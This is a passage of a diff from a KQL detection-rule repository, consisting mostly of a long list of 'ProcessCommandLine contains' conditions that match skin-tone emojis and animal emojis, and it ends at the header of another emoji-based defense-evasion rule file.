"🧍🏽‍♂️" or ProcessCommandLine contains "👭🏽" or ProcessCommandLine contains "🧑🏽‍🤝‍🧑🏽" or ProcessCommandLine contains "👬🏽" or ProcessCommandLine contains "👫🏽" or ProcessCommandLine contains "🧗🏽‍♀️" or ProcessCommandLine contains "🧗🏽" or ProcessCommandLine contains "🧗🏽‍♂️" or ProcessCommandLine contains "🏇🏽" or ProcessCommandLine contains "🏂🏽" or ProcessCommandLine contains "🏌🏽‍♀️" or ProcessCommandLine contains "🏌🏽" or ProcessCommandLine contains "🏌🏽‍♂️" or ProcessCommandLine contains "🏄🏽‍♀️" or ProcessCommandLine contains "🏄🏽" or ProcessCommandLine contains "🏄🏽‍♂️" or ProcessCommandLine contains "🚣🏽‍♀️" or ProcessCommandLine contains "🚣🏽" or ProcessCommandLine contains "🚣🏽‍♂️" or ProcessCommandLine contains "🏊🏽‍♀️" or ProcessCommandLine contains "🏊🏽" or ProcessCommandLine contains "🏊🏽‍♂️" or ProcessCommandLine contains "⛹🏽‍♀️" or ProcessCommandLine contains "⛹🏽" or ProcessCommandLine contains "⛹🏽‍♂️" or ProcessCommandLine contains "🏋🏽‍♀️" or ProcessCommandLine contains "🏋🏽" or ProcessCommandLine contains "🏋🏽‍♂️" or ProcessCommandLine contains "🚴🏽‍♀️" or ProcessCommandLine contains "🚴🏽" or ProcessCommandLine contains "🚴🏽‍♂️" or ProcessCommandLine contains "🚵🏽‍♀️" or ProcessCommandLine contains "🚵🏽" or ProcessCommandLine contains "🚵🏽‍♂️" or ProcessCommandLine contains "🤸🏽‍♀️" or ProcessCommandLine contains "🤸🏽" or ProcessCommandLine contains "🤸🏽‍♂️" or ProcessCommandLine contains "🤽🏽‍♀️" or ProcessCommandLine contains "🤽🏽" or ProcessCommandLine contains "🤽🏽‍♂️" or ProcessCommandLine contains "🤾🏽‍♀️" or ProcessCommandLine contains "🤾🏽" or ProcessCommandLine contains "🤾🏽‍♂️" or ProcessCommandLine contains "🤹🏽‍♀️" or ProcessCommandLine contains "🤹🏽" or ProcessCommandLine contains "🤹🏽‍♂️" or ProcessCommandLine contains "🧘🏽‍♀️" or ProcessCommandLine contains "🧘🏽" or ProcessCommandLine contains "🧘🏽‍♂️" or ProcessCommandLine contains "🛀🏽" or ProcessCommandLine contains "🛌🏽" or ProcessCommandLine contains "👋🏾" or ProcessCommandLine contains "🤚🏾" or ProcessCommandLine contains "🖐🏾" or ProcessCommandLine contains "✋🏾" or ProcessCommandLine contains "🖖🏾" or ProcessCommandLine contains "👌🏾" or ProcessCommandLine contains "🤌🏾" or ProcessCommandLine contains "🤏🏾" or ProcessCommandLine contains "✌🏾" or ProcessCommandLine contains "🤞🏾" or ProcessCommandLine contains "🫰🏾" or ProcessCommandLine contains "🤟🏾" or ProcessCommandLine contains "🤘🏾" or ProcessCommandLine contains "🤙🏾" or ProcessCommandLine contains "🫵🏾" or ProcessCommandLine contains "🫱🏾" or ProcessCommandLine contains "🫲🏾" or ProcessCommandLine contains "🫳🏾" or ProcessCommandLine contains "🫴🏾" or ProcessCommandLine contains "👈🏾" or ProcessCommandLine contains "👉🏾" or ProcessCommandLine contains "👆🏾" or ProcessCommandLine contains "🖕🏾" or ProcessCommandLine contains "👇🏾" or ProcessCommandLine contains "☝🏾" or ProcessCommandLine contains "👍🏾" or ProcessCommandLine contains "👎🏾" or ProcessCommandLine contains "✊🏾" or ProcessCommandLine contains "👊🏾" or ProcessCommandLine contains "🤛🏾" or ProcessCommandLine contains "🤜🏾" or ProcessCommandLine contains "👏🏾" or ProcessCommandLine contains "🫶🏾" or ProcessCommandLine contains "🙌🏾" or ProcessCommandLine contains "👐🏾" or ProcessCommandLine contains "🤲🏾" or ProcessCommandLine contains "🙏🏾" or ProcessCommandLine contains "✍🏾" or ProcessCommandLine contains "💪🏾" or ProcessCommandLine contains "🦵🏾" or ProcessCommandLine contains "🦶🏾" or ProcessCommandLine contains "👂🏾" or ProcessCommandLine contains "🦻🏾" or ProcessCommandLine contains "👃🏾" or ProcessCommandLine contains "👶🏾" or ProcessCommandLine contains "👧🏾" or ProcessCommandLine contains "🧒🏾" or ProcessCommandLine contains "👦🏾" or ProcessCommandLine contains "👩🏾" or ProcessCommandLine contains "🧑🏾" or ProcessCommandLine contains "👨🏾" or ProcessCommandLine contains "👩🏾‍🦱" or ProcessCommandLine contains "🧑🏾‍🦱" or ProcessCommandLine contains "👨🏾‍🦱" or ProcessCommandLine contains "👩🏾‍🦰" or ProcessCommandLine contains "🧑🏾‍🦰" or ProcessCommandLine contains "👨🏾‍🦰" or ProcessCommandLine contains "👱🏾‍♀️" or ProcessCommandLine contains "👱🏾" or ProcessCommandLine contains "👱🏾‍♂️" or ProcessCommandLine contains "👩🏾‍🦳" or ProcessCommandLine contains "🧑🏾‍🦳" or ProcessCommandLine contains "👨🏾‍🦳" or ProcessCommandLine contains "👩🏾‍🦲" or ProcessCommandLine contains "🧑🏾‍🦲" or ProcessCommandLine contains "👨🏾‍🦲" or ProcessCommandLine contains "🧔🏾‍♀️" or ProcessCommandLine contains "🧔🏾" or ProcessCommandLine contains "🧔🏾‍♂️" or ProcessCommandLine contains "👵🏾" or ProcessCommandLine contains "🧓🏾" or ProcessCommandLine contains "👴🏾" or ProcessCommandLine contains "👲🏾" or ProcessCommandLine contains "👳🏾‍♀️" or ProcessCommandLine contains "👳🏾" or ProcessCommandLine contains "👳🏾‍♂️" or ProcessCommandLine contains "🧕🏾" or ProcessCommandLine contains "👮🏾‍♀️" or ProcessCommandLine contains "👮🏾" or ProcessCommandLine contains "👮🏾‍♂️" or ProcessCommandLine contains "👷🏾‍♀️" or ProcessCommandLine contains "👷🏾" or ProcessCommandLine contains "👷🏾‍♂️" or ProcessCommandLine contains "💂🏾‍♀️" or ProcessCommandLine contains "💂🏾" or ProcessCommandLine contains "💂🏾‍♂️" or ProcessCommandLine contains "🕵🏾‍♀️" or ProcessCommandLine contains "🕵🏾" or ProcessCommandLine contains "🕵🏾‍♂️" or ProcessCommandLine contains "👩🏾‍⚕️" or ProcessCommandLine contains "🧑🏾‍⚕️" or ProcessCommandLine contains "👨🏾‍⚕️" or ProcessCommandLine contains "👩🏾‍🌾" or ProcessCommandLine contains "🧑🏾‍🌾" or ProcessCommandLine contains "👨🏾‍🌾" or ProcessCommandLine contains "👩🏾‍🍳" or ProcessCommandLine contains "🧑🏾‍🍳" or ProcessCommandLine contains "👨🏾‍🍳" or ProcessCommandLine contains "👩🏾‍🎓" or ProcessCommandLine contains "🧑🏾‍🎓" or ProcessCommandLine contains "👨🏾‍🎓" or ProcessCommandLine contains "👩🏾‍🎤" or ProcessCommandLine contains "🧑🏾‍🎤" or ProcessCommandLine contains "👨🏾‍🎤" or ProcessCommandLine contains "👩🏾‍🏫" or ProcessCommandLine contains "🧑🏾‍🏫" or ProcessCommandLine contains "👨🏾‍🏫" or ProcessCommandLine contains "👩🏾‍🏭" or ProcessCommandLine contains "🧑🏾‍🏭" or ProcessCommandLine contains "👨🏾‍🏭" or ProcessCommandLine contains "👩🏾‍💻" or ProcessCommandLine contains "🧑🏾‍💻" or ProcessCommandLine contains "👨🏾‍💻" or ProcessCommandLine contains "👩🏾‍💼" or ProcessCommandLine contains "🧑🏾‍💼" or ProcessCommandLine contains "👨🏾‍💼" or ProcessCommandLine contains "👩🏾‍🔧" or ProcessCommandLine contains "🧑🏾‍🔧" or ProcessCommandLine contains "👨🏾‍🔧" or ProcessCommandLine contains "👩🏾‍🔬" or ProcessCommandLine contains "🧑🏾‍🔬" or ProcessCommandLine contains "👨🏾‍🔬" or ProcessCommandLine contains "👩🏾‍🎨" or ProcessCommandLine contains "🧑🏾‍🎨" or ProcessCommandLine contains "👨🏾‍🎨" or ProcessCommandLine contains "👩🏾‍🚒" or ProcessCommandLine contains "🧑🏾‍🚒" or ProcessCommandLine contains "👨🏾‍🚒" or ProcessCommandLine contains "👩🏾‍✈️" or ProcessCommandLine contains "🧑🏾‍✈️" or ProcessCommandLine contains "👨🏾‍✈️" or ProcessCommandLine contains "👩🏾‍🚀" or ProcessCommandLine contains "🧑🏾‍🚀" or ProcessCommandLine contains "👨🏾‍🚀" or ProcessCommandLine contains "👩🏾‍⚖️" or ProcessCommandLine contains "🧑🏾‍⚖️" or ProcessCommandLine contains "👨🏾‍⚖️" or ProcessCommandLine contains "👰🏾‍♀️" or ProcessCommandLine contains "👰🏾" or ProcessCommandLine contains "👰🏾‍♂️" or ProcessCommandLine contains "🤵🏾‍♀️" or ProcessCommandLine contains "🤵🏾" or ProcessCommandLine contains "🤵🏾‍♂️" or ProcessCommandLine contains "👸🏾" or ProcessCommandLine contains "🫅🏾" or ProcessCommandLine contains "🤴🏾" or ProcessCommandLine contains "🥷🏾" or ProcessCommandLine contains "🦸🏾‍♀️" or ProcessCommandLine contains "🦸🏾" or ProcessCommandLine contains "🦸🏾‍♂️" or ProcessCommandLine contains "🦹🏾‍♀️" or ProcessCommandLine contains "🦹🏾" or ProcessCommandLine contains "🦹🏾‍♂️" or ProcessCommandLine contains "🤶🏾" or ProcessCommandLine contains "🧑🏾‍🎄" or ProcessCommandLine contains "🎅🏾" or ProcessCommandLine contains "🧙🏾‍♀️" or ProcessCommandLine contains "🧙🏾" or ProcessCommandLine contains "🧙🏾‍♂️" or ProcessCommandLine contains "🧝🏾‍♀️" or ProcessCommandLine contains "🧝🏾" or ProcessCommandLine contains "🧝🏾‍♂️" or ProcessCommandLine contains "🧛🏾‍♀️" or ProcessCommandLine contains "🧛🏾" or ProcessCommandLine contains "🧛🏾‍♂️" or ProcessCommandLine contains "🧜🏾‍♀️" or ProcessCommandLine contains "🧜🏾" or ProcessCommandLine contains "🧜🏾‍♂️" or ProcessCommandLine contains "🧚🏾‍♀️" or ProcessCommandLine contains "🧚🏾" or ProcessCommandLine contains "🧚🏾‍♂️" or ProcessCommandLine contains "👼🏾" or ProcessCommandLine contains "🤰🏾" or ProcessCommandLine contains "🫄🏾" or ProcessCommandLine contains "🫃🏾" or ProcessCommandLine contains "🤱🏾" or ProcessCommandLine contains "👩🏾‍🍼" or ProcessCommandLine contains "🧑🏾‍🍼" or ProcessCommandLine contains "👨🏾‍🍼" or ProcessCommandLine contains "🙇🏾‍♀️" or ProcessCommandLine contains "🙇🏾" or ProcessCommandLine contains "🙇🏾‍♂️" or ProcessCommandLine contains "💁🏾‍♀️" or ProcessCommandLine contains "💁🏾" or ProcessCommandLine contains "💁🏾‍♂️" or ProcessCommandLine contains "🙅🏾‍♀️" or ProcessCommandLine contains "🙅🏾" or ProcessCommandLine contains "🙅🏾‍♂️" or ProcessCommandLine contains "🙆🏾‍♀️" or ProcessCommandLine contains "🙆🏾" or ProcessCommandLine contains "🙆🏾‍♂️" or ProcessCommandLine contains "🙋🏾‍♀️" or ProcessCommandLine contains "🙋🏾" or ProcessCommandLine contains "🙋🏾‍♂️" or ProcessCommandLine contains "🧏🏾‍♀️" or ProcessCommandLine contains "🧏🏾" or ProcessCommandLine contains "🧏🏾‍♂️" or ProcessCommandLine contains "🤦🏾‍♀️" or ProcessCommandLine contains "🤦🏾" or ProcessCommandLine contains "🤦🏾‍♂️" or ProcessCommandLine contains "🤷🏾‍♀️" or ProcessCommandLine contains "🤷🏾" or ProcessCommandLine contains "🤷🏾‍♂️" or ProcessCommandLine contains "🙎🏾‍♀️" or ProcessCommandLine contains "🙎🏾" or ProcessCommandLine contains "🙎🏾‍♂️" or ProcessCommandLine contains "🙍🏾‍♀️" or ProcessCommandLine contains "🙍🏾" or ProcessCommandLine contains "🙍🏾‍♂️" or ProcessCommandLine contains "💇🏾‍♀️" or ProcessCommandLine contains "💇🏾" or ProcessCommandLine contains "💇🏾‍♂️" or ProcessCommandLine contains "💆🏾‍♀️" or ProcessCommandLine contains "💆🏾" or ProcessCommandLine contains "💆🏾‍♂️" or ProcessCommandLine contains "🧖🏾‍♀️" or ProcessCommandLine contains "🧖🏾" or ProcessCommandLine contains "🧖🏾‍♂️" or ProcessCommandLine contains "💃🏾" or ProcessCommandLine contains "🕺🏾" or ProcessCommandLine contains "👩🏾‍🦽" or ProcessCommandLine contains "🧑🏾‍🦽" or ProcessCommandLine contains "👨🏾‍🦽" or ProcessCommandLine contains "👩🏾‍🦼" or ProcessCommandLine contains "🧑🏾‍🦼" or ProcessCommandLine contains "👨🏾‍🦼" or ProcessCommandLine contains "🚶🏾‍♀️" or ProcessCommandLine contains "🚶🏾" or ProcessCommandLine contains "🚶🏾‍♂️" or ProcessCommandLine contains "👩🏾‍🦯" or ProcessCommandLine contains "🧑🏾‍🦯" or ProcessCommandLine contains "👨🏾‍🦯" or ProcessCommandLine contains "🧎🏾‍♀️" or ProcessCommandLine contains "🧎🏾" or ProcessCommandLine contains "🧎🏾‍♂️" or ProcessCommandLine contains "🏃🏾‍♀️" or ProcessCommandLine contains "🏃🏾" or ProcessCommandLine contains "🏃🏾‍♂️" or ProcessCommandLine contains "🧍🏾‍♀️" or ProcessCommandLine contains "🧍🏾" or ProcessCommandLine contains "🧍🏾‍♂️" or ProcessCommandLine contains "👭🏾" or ProcessCommandLine contains "🧑🏾‍🤝‍🧑🏾" or ProcessCommandLine contains "👬🏾" or ProcessCommandLine contains "👫🏾" or ProcessCommandLine contains "🧗🏾‍♀️" or ProcessCommandLine contains "🧗🏾" or ProcessCommandLine contains "🧗🏾‍♂️" or ProcessCommandLine contains "🏇🏾" or ProcessCommandLine contains "🏂🏾" or ProcessCommandLine contains "🏌🏾‍♀️" or ProcessCommandLine contains "🏌🏾" or ProcessCommandLine contains "🏌🏾‍♂️" or ProcessCommandLine contains "🏄🏾‍♀️" or ProcessCommandLine contains "🏄🏾" or ProcessCommandLine contains "🏄🏾‍♂️" or ProcessCommandLine contains "🚣🏾‍♀️" or ProcessCommandLine contains "🚣🏾" or ProcessCommandLine contains "🚣🏾‍♂️" or ProcessCommandLine contains "🏊🏾‍♀️" or ProcessCommandLine contains "🏊🏾" or ProcessCommandLine contains "🏊🏾‍♂️" or ProcessCommandLine contains "⛹🏾‍♀️" or ProcessCommandLine contains "⛹🏾" or ProcessCommandLine contains "⛹🏾‍♂️" or ProcessCommandLine contains "🏋🏾‍♀️" or ProcessCommandLine contains "🏋🏾" or ProcessCommandLine contains "🏋🏾‍♂️" or ProcessCommandLine contains "🚴🏾‍♀️" or ProcessCommandLine contains "🚴🏾" or ProcessCommandLine contains "🚴🏾‍♂️" or ProcessCommandLine contains "🚵🏾‍♀️" or ProcessCommandLine contains "🚵🏾" or ProcessCommandLine contains "🚵🏾‍♂️" or ProcessCommandLine contains "🤸🏾‍♀️" or ProcessCommandLine contains "🤸🏾" or ProcessCommandLine contains "🤸🏾‍♂️" or ProcessCommandLine contains "🤽🏾‍♀️" or ProcessCommandLine contains "🤽🏾" or ProcessCommandLine contains "🤽🏾‍♂️" or ProcessCommandLine contains "🤾🏾‍♀️" or ProcessCommandLine contains "🤾🏾" or ProcessCommandLine contains "🤾🏾‍♂️" or ProcessCommandLine contains "🤹🏾‍♀️" or ProcessCommandLine contains "🤹🏾" or ProcessCommandLine contains "🤹🏾‍♂️" or ProcessCommandLine contains "🧘🏾‍♀️" or ProcessCommandLine contains "🧘🏾" or ProcessCommandLine contains "🧘🏾‍♂️" or ProcessCommandLine contains "🛀🏾" or ProcessCommandLine contains "🛌🏾" or ProcessCommandLine contains "👋🏿" or ProcessCommandLine contains "🤚🏿" or ProcessCommandLine contains "🖐🏿" or ProcessCommandLine contains "✋🏿" or ProcessCommandLine contains "🖖🏿" or ProcessCommandLine contains "👌🏿" or ProcessCommandLine contains "🤌🏿" or ProcessCommandLine contains "🤏🏿" or ProcessCommandLine contains "✌🏿" or ProcessCommandLine contains "🤞🏿" or ProcessCommandLine contains "🫰🏿" or ProcessCommandLine contains "🤟🏿" or ProcessCommandLine contains "🤘🏿" or ProcessCommandLine contains "🤙🏿" or ProcessCommandLine contains "🫵🏿" or ProcessCommandLine contains "🫱🏿" or ProcessCommandLine contains "🫲🏿" or ProcessCommandLine contains "🫳🏿" or ProcessCommandLine contains "🫴🏿" or ProcessCommandLine contains "👈🏿" or ProcessCommandLine contains "👉🏿" or ProcessCommandLine contains "👆🏿" or ProcessCommandLine contains "🖕🏿" or ProcessCommandLine contains "👇🏿" or ProcessCommandLine contains "☝🏿" or ProcessCommandLine contains "👍🏿" or ProcessCommandLine contains "👎🏿" or ProcessCommandLine contains "✊🏿" or ProcessCommandLine contains "👊🏿" or ProcessCommandLine contains "🤛🏿" or ProcessCommandLine contains "🤜🏿" or ProcessCommandLine contains "👏🏿" or ProcessCommandLine contains "🫶🏿" or ProcessCommandLine contains "🙌🏿" or ProcessCommandLine contains "👐🏿" or ProcessCommandLine contains "🤲🏿" or ProcessCommandLine contains "🙏🏿" or ProcessCommandLine contains "✍🏿" or ProcessCommandLine contains "🤳🏿" or ProcessCommandLine contains "💪🏿" or ProcessCommandLine contains "🦵🏿" or ProcessCommandLine contains "🦶🏿" or ProcessCommandLine contains "👂🏿" or ProcessCommandLine contains "🦻🏿" or ProcessCommandLine contains "👃🏿" or ProcessCommandLine contains "👶🏿" or ProcessCommandLine contains "👧🏿" or ProcessCommandLine contains "🧒🏿" or ProcessCommandLine contains "👦🏿" or ProcessCommandLine contains "👩🏿" or ProcessCommandLine contains "🧑🏿" or ProcessCommandLine contains "👨🏿" or ProcessCommandLine contains "👩🏿‍🦱" or ProcessCommandLine contains "🧑🏿‍🦱" or ProcessCommandLine contains "👨🏿‍🦱" or ProcessCommandLine contains "👩🏿‍🦰" or ProcessCommandLine contains "🧑🏿‍🦰" or ProcessCommandLine contains "👨🏿‍🦰" or ProcessCommandLine contains "👱🏿‍♀️" or ProcessCommandLine contains "👱🏿" or ProcessCommandLine contains "👱🏿‍♂️" or ProcessCommandLine contains "👩🏿‍🦳" or ProcessCommandLine contains "🧑🏿‍🦳" or ProcessCommandLine contains "👨🏿‍🦳" or ProcessCommandLine contains "👩🏿‍🦲" or ProcessCommandLine contains "🧑🏿‍🦲" or ProcessCommandLine contains "👨🏿‍🦲" or ProcessCommandLine contains "🧔🏿‍♀️" or ProcessCommandLine contains "🧔🏿" or ProcessCommandLine contains "🧔🏿‍♂️" or ProcessCommandLine contains "👵🏿" or ProcessCommandLine contains "🧓🏿" or ProcessCommandLine contains "👴🏿" or ProcessCommandLine contains "👲🏿" or ProcessCommandLine contains "👳🏿‍♀️" or ProcessCommandLine contains "👳🏿" or ProcessCommandLine contains "👳🏿‍♂️" or ProcessCommandLine contains "🧕🏿" or ProcessCommandLine contains "👮🏿‍♀️" or ProcessCommandLine contains "👮🏿" or ProcessCommandLine contains "👮🏿‍♂️" or ProcessCommandLine contains "👷🏿‍♀️" or ProcessCommandLine contains "👷🏿" or ProcessCommandLine contains "👷🏿‍♂️" or ProcessCommandLine contains "💂🏿‍♀️" or ProcessCommandLine contains "💂🏿" or ProcessCommandLine contains "💂🏿‍♂️" or ProcessCommandLine contains "🕵🏿‍♀️" or ProcessCommandLine contains "🕵🏿" or ProcessCommandLine contains "🕵🏿‍♂️" or ProcessCommandLine contains "👩🏿‍⚕️" or ProcessCommandLine contains "🧑🏿‍⚕️" or ProcessCommandLine contains "👨🏿‍⚕️" or ProcessCommandLine contains "👩🏿‍🌾" or ProcessCommandLine contains "🧑🏿‍🌾" or ProcessCommandLine contains "👨🏿‍🌾" or ProcessCommandLine contains "👩🏿‍🍳" or ProcessCommandLine contains "🧑🏿‍🍳" or ProcessCommandLine contains "👨🏿‍🍳" or ProcessCommandLine contains "👩🏿‍🎓" or ProcessCommandLine contains "🧑🏿‍🎓" or ProcessCommandLine contains "👨🏿‍🎓" or ProcessCommandLine contains "👩🏿‍🎤" or ProcessCommandLine contains "🧑🏿‍🎤" or ProcessCommandLine contains "👨🏿‍🎤" or ProcessCommandLine contains "👩🏿‍🏫" or ProcessCommandLine contains "🧑🏿‍🏫" or ProcessCommandLine contains "👨🏿‍🏫" or ProcessCommandLine contains "👩🏿‍🏭" or ProcessCommandLine contains "🧑🏿‍🏭" or ProcessCommandLine contains "👨🏿‍🏭" or ProcessCommandLine contains "👩🏿‍💻" or ProcessCommandLine contains "🧑🏿‍💻" or ProcessCommandLine contains "👨🏿‍💻" or ProcessCommandLine contains "👩🏿‍💼" or ProcessCommandLine contains "🧑🏿‍💼" or ProcessCommandLine contains "👨🏿‍💼" or ProcessCommandLine contains "👩🏿‍🔧" or ProcessCommandLine contains "🧑🏿‍🔧" or ProcessCommandLine contains "👨🏿‍🔧" or ProcessCommandLine contains "👩🏿‍🔬" or ProcessCommandLine contains "🧑🏿‍🔬" or ProcessCommandLine contains "👨🏿‍🔬" or ProcessCommandLine contains "👩🏿‍🎨" or ProcessCommandLine contains "🧑🏿‍🎨" or ProcessCommandLine contains "👨🏿‍🎨" or ProcessCommandLine contains "👩🏿‍🚒" or ProcessCommandLine contains "🧑🏿‍🚒" or ProcessCommandLine contains "👨🏿‍🚒" or ProcessCommandLine contains "👩🏿‍✈️" or ProcessCommandLine contains "🧑🏿‍✈️" or ProcessCommandLine contains "👨🏿‍✈️" or ProcessCommandLine contains "👩🏿‍🚀" or ProcessCommandLine contains "🧑🏿‍🚀" or ProcessCommandLine contains "👨🏿‍🚀" or ProcessCommandLine contains "👩🏿‍⚖️" or ProcessCommandLine contains "🧑🏿‍⚖️" or ProcessCommandLine contains "👨🏿‍⚖️" or ProcessCommandLine contains "👰🏿‍♀️" or ProcessCommandLine contains "👰🏿" or ProcessCommandLine contains "👰🏿‍♂️" or ProcessCommandLine contains "🤵🏿‍♀️" or ProcessCommandLine contains "🤵🏿" or ProcessCommandLine contains "🤵🏿‍♂️" or ProcessCommandLine contains "👸🏿" or ProcessCommandLine contains "🫅🏿" or ProcessCommandLine contains "🤴🏿" or ProcessCommandLine contains "🥷🏿" or ProcessCommandLine contains "🦸🏿‍♀️" or ProcessCommandLine contains "🦸🏿" or ProcessCommandLine contains "🦸🏿‍♂️" or ProcessCommandLine contains "🦹🏿‍♀️" or ProcessCommandLine contains "🦹🏿" or ProcessCommandLine contains "🦹🏿‍♂️" or ProcessCommandLine contains "🤶🏿" or ProcessCommandLine contains "🧑🏿‍🎄" or ProcessCommandLine contains "🎅🏿" or ProcessCommandLine contains "🧙🏿‍♀️" or ProcessCommandLine contains "🧙🏿" or ProcessCommandLine contains "🧙🏿‍♂️" or ProcessCommandLine contains "🧝🏿‍♀️" or ProcessCommandLine contains "🧝🏿" or ProcessCommandLine contains "🧝🏿‍♂️" or ProcessCommandLine contains "🧛🏿‍♀️" or ProcessCommandLine contains "🧛🏿" or ProcessCommandLine contains "🧛🏿‍♂️" or ProcessCommandLine contains "🧜🏿‍♀️" or ProcessCommandLine contains "🧜🏿" or ProcessCommandLine contains "🧜🏿‍♂️" or ProcessCommandLine contains "🧚🏿‍♀️" or ProcessCommandLine contains "🧚🏿" or ProcessCommandLine contains "🧚🏿‍♂️" or ProcessCommandLine contains "👼🏿" or ProcessCommandLine contains "🤰🏿" or ProcessCommandLine contains "🫄🏿" or ProcessCommandLine contains "🫃🏿" or ProcessCommandLine contains "🤱🏿" or ProcessCommandLine contains "👩🏿‍🍼" or ProcessCommandLine contains "🧑🏿‍🍼" or ProcessCommandLine contains "👨🏿‍🍼" or ProcessCommandLine contains "🙇🏿‍♀️" or ProcessCommandLine contains "🙇🏿" or ProcessCommandLine contains "🙇🏿‍♂️" or ProcessCommandLine contains "💁🏿‍♀️" or ProcessCommandLine contains "💁🏿" or ProcessCommandLine contains "💁🏿‍♂️" or ProcessCommandLine contains "🙅🏿‍♀️" or ProcessCommandLine contains "🙅🏿" or ProcessCommandLine contains "🙅🏿‍♂️" or ProcessCommandLine contains "🙆🏿‍♀️" or ProcessCommandLine contains "🙆🏿" or ProcessCommandLine contains "🙆🏿‍♂️" or ProcessCommandLine contains "🙋🏿‍♀️" or ProcessCommandLine contains "🙋🏿" or ProcessCommandLine contains "🙋🏿‍♂️" or ProcessCommandLine contains "🧏🏿‍♀️" or ProcessCommandLine contains "🧏🏿" or ProcessCommandLine contains "🧏🏿‍♂️" or ProcessCommandLine contains "🤦🏿‍♀️" or ProcessCommandLine contains "🤦🏿" or ProcessCommandLine contains "🤦🏿‍♂️" or ProcessCommandLine contains "🤷🏿‍♀️" or ProcessCommandLine contains "🤷🏿" or ProcessCommandLine contains "🤷🏿‍♂️" or ProcessCommandLine contains "🙎🏿‍♀️" or ProcessCommandLine contains "🙎🏿" or ProcessCommandLine contains "🙎🏿‍♂️" or ProcessCommandLine contains "🙍🏿‍♀️" or ProcessCommandLine contains "🙍🏿" or ProcessCommandLine contains "🙍🏿‍♂️" or ProcessCommandLine contains "💇🏿‍♀️" or ProcessCommandLine contains "💇🏿" or ProcessCommandLine contains "💇🏿‍♂️" or ProcessCommandLine contains "💆🏿‍♀️" or ProcessCommandLine contains "💆🏿" or ProcessCommandLine contains "💆🏿‍♂️" or ProcessCommandLine contains "🧖🏿‍♀️" or ProcessCommandLine contains "🧖🏿" or ProcessCommandLine contains "🧖🏿‍♂️" or ProcessCommandLine contains "💃🏿" or ProcessCommandLine contains "🕺🏿" or ProcessCommandLine contains "🕴🏿" or ProcessCommandLine contains "👩🏿‍🦽" or ProcessCommandLine contains "🧑🏿‍🦽" or ProcessCommandLine contains "👨🏿‍🦽" or ProcessCommandLine contains "👩🏿‍🦼" or ProcessCommandLine contains "🧑🏿‍🦼" or ProcessCommandLine contains "👨🏿‍🦼" or ProcessCommandLine contains "🚶🏿‍♀️" or ProcessCommandLine contains "🚶🏿" or ProcessCommandLine contains "🚶🏿‍♂️" or ProcessCommandLine contains "👩🏿‍🦯" or ProcessCommandLine contains "🧑🏿‍🦯" or ProcessCommandLine contains "👨🏿‍🦯" or ProcessCommandLine contains "🧎🏿‍♀️" or ProcessCommandLine contains "🧎🏿" or ProcessCommandLine contains "🧎🏿‍♂️" or ProcessCommandLine contains "🏃🏿‍♀️" or ProcessCommandLine contains "🏃🏿" or ProcessCommandLine contains "🏃🏿‍♂️" or ProcessCommandLine contains "🧍🏿‍♀️" or ProcessCommandLine contains "🧍🏿" or ProcessCommandLine contains "🧍🏿‍♂️" or ProcessCommandLine contains "👭🏿" or ProcessCommandLine contains "🧑🏿‍🤝‍🧑🏿" or ProcessCommandLine contains "👬🏿" or ProcessCommandLine contains "👫🏿" or ProcessCommandLine contains "🧗🏿‍♀️" or ProcessCommandLine contains "🧗🏿" or ProcessCommandLine contains "🧗🏿‍♂️" or ProcessCommandLine contains "🏇🏿" or ProcessCommandLine contains "🏂🏿" or ProcessCommandLine contains "🏌🏿‍♀️" or ProcessCommandLine contains "🏌🏿" or ProcessCommandLine contains "🏌🏿‍♂️" or ProcessCommandLine contains "🏄🏿‍♀️" or ProcessCommandLine contains "🏄🏿" or ProcessCommandLine contains "🏄🏿‍♂️" or ProcessCommandLine contains "🚣🏿‍♀️" or ProcessCommandLine contains "🚣🏿" or ProcessCommandLine contains "🚣🏿‍♂️" or ProcessCommandLine contains "🏊🏿‍♀️" or ProcessCommandLine contains "🏊🏿" or ProcessCommandLine contains "🏊🏿‍♂️" or ProcessCommandLine contains "⛹🏿‍♀️" or ProcessCommandLine contains "⛹🏿" or ProcessCommandLine contains "⛹🏿‍♂️" or ProcessCommandLine contains "🏋🏿‍♀️" or ProcessCommandLine contains "🏋🏿" or ProcessCommandLine contains "🏋🏿‍♂️" or ProcessCommandLine contains "🚴🏿‍♀️" or ProcessCommandLine contains "🚴🏿" or ProcessCommandLine contains "🚴🏿‍♂️" or ProcessCommandLine contains "🚵🏿‍♀️" or ProcessCommandLine contains "🚵🏿" or ProcessCommandLine contains "🚵🏿‍♂️" or ProcessCommandLine contains "🤸🏿‍♀️" or ProcessCommandLine contains "🤸🏿" or ProcessCommandLine contains "🤸🏿‍♂️" or ProcessCommandLine contains "🤽🏿‍♀️" or ProcessCommandLine contains "🤽🏿" or ProcessCommandLine contains "🤽🏿‍♂️" or ProcessCommandLine contains "🤾🏿‍♀️" or ProcessCommandLine contains "🤾🏿" or ProcessCommandLine contains "🤾🏿‍♂️" or ProcessCommandLine contains "🤹🏿‍♀️" or ProcessCommandLine contains "🤹🏿" or ProcessCommandLine contains "🤹🏿‍♂️" or ProcessCommandLine contains "🧘🏿‍♀️" or ProcessCommandLine contains "🧘🏿" or ProcessCommandLine contains "🧘🏿‍♂️" or ProcessCommandLine contains "🛀🏿" or ProcessCommandLine contains "🛌🏿" or ProcessCommandLine contains "🐶" or ProcessCommandLine contains "🐱" or ProcessCommandLine contains "🐭" or ProcessCommandLine contains "🐹" or ProcessCommandLine contains "🐰" or ProcessCommandLine contains "🦊" or ProcessCommandLine contains "🐻" or ProcessCommandLine contains "🐼" or ProcessCommandLine contains "🐻‍❄️" or ProcessCommandLine contains "🐨" or ProcessCommandLine contains "🐯" or ProcessCommandLine contains "🦁" or ProcessCommandLine contains "🐮" or ProcessCommandLine contains "🐷" or ProcessCommandLine contains "🐽" or ProcessCommandLine contains "🐸" or ProcessCommandLine contains "🐵" or ProcessCommandLine contains "🙈" or ProcessCommandLine contains "🙉" or ProcessCommandLine contains "🙊" or ProcessCommandLine contains "🐒" or ProcessCommandLine contains "🐔" or ProcessCommandLine contains "🐧" or ProcessCommandLine contains "🐦" or ProcessCommandLine contains "🐤" or ProcessCommandLine contains "🐣" or ProcessCommandLine contains "🐥" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_3.kql b/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_3.kql new file mode 100644 index 00000000..139776a1 --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_3.kql @@ -0,0 +1,10 @@ +// Title: 